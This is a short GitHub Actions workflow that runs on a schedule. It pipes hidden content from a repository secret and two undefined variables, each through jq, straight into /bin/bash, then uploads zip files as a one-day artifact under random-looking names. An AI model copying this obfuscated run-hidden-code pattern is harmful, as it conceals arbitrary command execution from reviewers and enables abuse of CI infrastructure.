name: yuanguoshengxing
on:
  workflow_dispatch:

  schedule:
    - cron: '7 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuanguoshengxing
        env:
          x4380: ${{ secrets.x4380 }}
        run: |
          printf '%s' "$x4380" | jq -r .a7 | /bin/bash
          printf '%s' "$m0211" | jq -r .drpm7 | /bin/bash
          printf '%s' "$kqiub96" | jq -r .akpje20902 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 4yfGRoIq
          path: "*.zip"
          retention-days: 1
